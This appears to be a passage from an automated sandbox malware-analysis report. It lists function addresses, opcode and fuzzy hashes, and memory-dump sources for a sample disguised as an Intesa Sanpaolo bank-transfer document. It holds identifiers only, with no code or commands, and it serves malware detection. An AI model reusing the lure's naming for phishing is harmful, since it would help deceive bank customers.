                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: fec19b6754fbad92517ac60733ce38e236eea0b787031e98cd260bc77a154162
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: 9AF05E727526139BFB299B4EDC80F16B7A8BFD5E60F1A0065A6049F260C764EC0187D0
                                  Function 0114C89D Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                  • Instruction ID: df39dfd5a02c2119fd30e321fc3773b366900fb2affd6b1fd7103b1b3d8bc3ad
                                  • Opcode Fuzzy Hash: 242af102fcd14d0db775b5e49cc0cb47fdfd3924d5bf7098dab7579b2b88af1e
                                  • Instruction Fuzzy Hash: D6F0AF70A1A3059FD318EF28C541A1BB7E4FF98714F40465AB898DB394E734EA00CB96
                                  Function 010F0854 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: 67083210e652bc064779d67e72a0ec2bd96048f624c0c0ef7c33cb3fda3c8848
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: D4F02472600200AFE314DB21CC01F86B6EAEF98300F148078AAC4C7164FBB4DD01C654
                                  Function 01148D20 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                  • Instruction ID: ea8f231fe76bba5a8b1eb26a0582145f180aa10023100d8b783c9d307f7ebb99
                                  • Opcode Fuzzy Hash: 323bdb14caa356250c560a6a216ba57723e8ad1f6cf2337db73e11070b898428
                                  • Instruction Fuzzy Hash: E1F0BB325012449BD62E6B5CD8C4B9EBF6EFB94B10F094469FA992711187306C81C790
                                  Function 0114C912 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                  • Instruction ID: c61278eab3a6c4451ec4a0239bf52c4c9e4c486fb7e3459312d7b545dbf3270e
                                  • Opcode Fuzzy Hash: 0a4b18b94a5a35dc9188e5bb3dbe868f66ac61f299a62b7135bf9f5df3c1a43b
                                  • Instruction Fuzzy Hash: B7F0AF74A02209AFCB08EF69C551B9EB7B4FF18300F008065A955EB385EA74EA01CB94
                                  Function 010C47FB Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                  • Instruction ID: 07962cd6854ac5ec4a710f63408ee5a7527125848bce4dd684b181d60bf46a28
                                  • Opcode Fuzzy Hash: 1a651a25a5cd40548a8b973052a3e596a154138e3785ba130e629346a26cae70
                                  • Instruction Fuzzy Hash: B1F0F0319122E58EE7728F1CC034B2F7BC4BB00E20F0888AED5C9C3522C724D888CE10
                                  Function 01180115 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                  • Instruction ID: 6f19b045fa4d2a13de06970a7f44788dd649ff1759716bde5b6efaa264d835e2
                                  • Opcode Fuzzy Hash: 8272032ab4f869fbb759104e1e219b05fccaefd50e0379042c3f623906690a2d
                                  • Instruction Fuzzy Hash: D4F027264156890ADF3E7B2C78D02D13B65A769124F095055E4B067209C774C8C7CB20
                                  Function 010FC5ED Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                  • Instruction ID: 6587e49b594246c33a893a5dabf3bc9220b086792e09bb634c4b05dcd88bc9f6
                                  • Opcode Fuzzy Hash: 12e408d3feab76e3b61f2db1930c5956edb8f719adc42dbb7b9f2442472a9b1c
                                  • Instruction Fuzzy Hash: A4F02E715192999BF7A2861CC30BF517BD49B0CAA0F0894AAC6C283E02C220E880CA40
                                  Function 01102619 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: 0acfc53c912cf14002daf3734cd8d0227d91f9d6413e993497ac8d213598d12c
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 85E0D8327006012BE726AE598CC4F47776EDFD6B14F040079B9045F292CAE2DC0982A4
                                  Function 01156030 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 7e13863c1fb5a9bb1f7f7b2ed3e69d90327c4805dbb6055050ec1a3941993d74
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: 75F06572104204DFE3699F09DD44F52B7F8EB05365F96C025EA199B561D379EC40CBE4
                                  Function 010C0710 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 71c38bb5e2c70cad8ba72231e833f752fa5950e5fabe420773ca333050730ff8
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: B9F0A039605341DBDB1ADF19D040AE97BA4FB41750B040058FC828B311D731E981DF55
                                  Function 010F49D0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: 0ad6f01f5fabb5719ca8e5d9930f512ed81b2ed22c03920639902e83956d6eaa
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: F1E0D832244645ABD3212A5D8802B6B7BE5DBD47A0F15042DEB80CB950DB74DC44C7D8
                                  Function 0116678E Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: 8330ba5906736a318c4f11fe2eb193b2ab123727316e8ec86173ecaa95ca33ce
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: E9E0DF32A00610BFDB25A7998D01FDBBEBCDB94FA0F050054BA00E71D4E630DE00D690
                                  Function 010C25E0 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                  • Instruction ID: 680a4650c292ef5062814784e9150072f8fdc3bcf498c1505d1f29020ff502f6
                                  • Opcode Fuzzy Hash: 2dced52e8800c02eadabe4105438a187c7554f9c0e795f1d635717dbd1874542
                                  • Instruction Fuzzy Hash: BCE09272100A549BC326BB29DD15FCA779AEB64764F014529F15597190CB34A850CB94
                                  Function 01144000 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction ID: cc240cf008e8aeb5311967299ba64434c93e19a9d5317ca721512763f7c5cb7f
                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction Fuzzy Hash: 55E0C2343003058FE719CF19C040BA27BB6BFD5A10F28C068A9488F605EB33E852CB40
                                  Function 010FCA38 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                  • Instruction ID: 3273ca11d2d568a64efdd7fbcd6cbbb7e1f96188ef6d82fe41c453b2df6fd0da
                                  • Opcode Fuzzy Hash: e75b30a34fe38bc75c0a7d4cdbcf6e1b4a6af6ae3b3d949bc1473692039ac47c
                                  • Instruction Fuzzy Hash: FED02B325810346EDB7AF11ABD06FD33AD99B44324F094CB4F74892414D554DC8592C4
                                  Function 010B823B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: 58f57d7aa300358c05ab6c892b71707eec8769a64e2b0eac52415d1aa99bc76f
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: 1EE0C231404E25EFDB363F16DC44F9576A9FF58B10F14882AE1C10A0B4C7B4AC81CB44
                                  Function 010C2050 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                  • Instruction ID: 2951800ecd747d0ccfc2c4f400d9cfc64155826e34570222680cfc33e030aa3b
                                  • Opcode Fuzzy Hash: 42f8a369b812e59827bcfcd9d5e1c41a899fecd46d29bf29f16ad2ddbdd41aec
                                  • Instruction Fuzzy Hash: 36E08C32100564ABC211FB5DDD50F8A739AEBA4660F000125F1918B690CA20AC40CB94
                                  Function 010F8A90 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction ID: c174f30d911eb8ccf7d94b892b613ffd27a186445535cb34fca37e9e1a2b0c50
                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction Fuzzy Hash: 7CE08633111A1487D728DE18D512BB677E4EF45720F09863EA65347780C534E548C794
                                  Function 01116AA4 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: 577dea735589853ff36bf6e45b93f67328906d29a60356893eb8c9abe3482633
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: 96D05E36511A50AFC3329F1BEA00C53FBF9FBC4A10705063EA54583924C771A806CBA0
                                  Function 010FE59C Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: 970dd3b3c8e17fb52561004913e76f8ec2b0dc8a3445bc41578d87bd48ae0a24
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: 16D0A932204A28ABD732AA1CFC00FC333E8BB88720F060459B008CB050C3A0AC81CA84
                                  Function 0113E908 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: 99ad4a9cae9d4a16737c9a51ca7ed2992dede0f20f40cccc6bf74d4b35edbc6b
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 99E0EC759517889BDF16DF59C640F9EBBB9BB94B40F151058A1485F664C724A900CB40
                                  Function 010BA0E3 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: ba496ee634c882761525fbe9166fb621853a937c417ec66ffdf887267be2b772
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 54D02232322070D7CB3857556840FE76905EB80A90F0A006D340A93800C0058C82C2E0
                                  Function 010FA830 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction ID: 460564d6b5842fadf77d8cceb97f206a8717b7275f720674891e70bddd896060
                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction Fuzzy Hash: 65D012771D064DBBCB119F66DC01F957BA9E764BA0F445020B5048B5A0C63AE950D684
                                  Function 010FCA24 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                  • Instruction ID: ccb97b03ad99cd3d6eefb2abd4ad410b99286f2f9c87e9413597452a6d7ac296
                                  • Opcode Fuzzy Hash: f11686ad8715f30a5e894bcdadde83369d59e47a40fb277f7c6fa2088b1ea4d1
                                  • Instruction Fuzzy Hash: 6ED0A730A01249CBEF1ECF08C612E6E36B0FB50640B40007CF74051821D325EC01C700
                                  Function 010D02A0 Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction ID: 477a968a0da935ae8058236d77ef6dba0ccd5d185319ad2db0faab5b993d2083
                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                  • Instruction Fuzzy Hash: 4BD09235612E80CFD65ACB0CC5A4B2533E4BB84A44F8104E0E445CBB26D628E950CA00
                                  Function 010FC700 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction ID: 86681701bcd605a77b2211518c4e26e24b2716146c1f228a5ed19d26b17d9425
                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                  • Instruction Fuzzy Hash: 9EC01232290648AFC712AB99CD01F427BA9EBA8B40F000021F2048B670C631E820EA84
                                  Function 010E0310 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction ID: bff56f7bca8b667f83ac3c5607c5b5f703418733df1e7d047e24966c02f4e3fe
                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                  • Instruction Fuzzy Hash: 89D01236200248EFCB01DF51C890D9A776AFBD8710F108019FD19076118A75ED62DA50
                                  Function 010C0750 Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction ID: a11dfc0a2422f5e358c61ebe76d35e60960afd63835eed4e6c5757aba4b4de2c
                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                  • Instruction Fuzzy Hash: C6C04C797016428FCF16DB5DD694F4577E4F744740F150890E845CB721E724E801CA11
                                  Function 01194DAD Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                  • Instruction ID: 4a8e756debd19aec5e2cec7661c933f06e68ba7a04c1400247d3915b6bcc3fa9
                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                  • Instruction Fuzzy Hash: 65B01232212545DFC7026721CB04B5832EDBF017C0F0900F465408D830D6188910E501
                                  Function 01104340 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                  • Instruction ID: 6ec35449439df6366f94fec8566b0ee965970dc0b6282e12473d8c69a02d0df5
                                  • Opcode Fuzzy Hash: 336711d991a7d5b804dc5397dbcb25f8067e8f516a1f2ac9b84d5ace1bf08c5b
                                  • Instruction Fuzzy Hash: 0E900232645800139144715859845469005A7E1301B55C021E0425554CCB148A565361
                                  Function 01104650 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                  • Instruction ID: 82ccc2b3fa0c1030cfe64393dba005efcba6c4be80408e0bc750da9cd9f3b995
                                  • Opcode Fuzzy Hash: 94c46c9aa6db852f567e6040c08504f5736a730b9eef307f468f32d28184449a
                                  • Instruction Fuzzy Hash: 3F90026264150043414471585904406B005A7E2301395C125A0555560CC71889559369
                                  Function 01102B80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
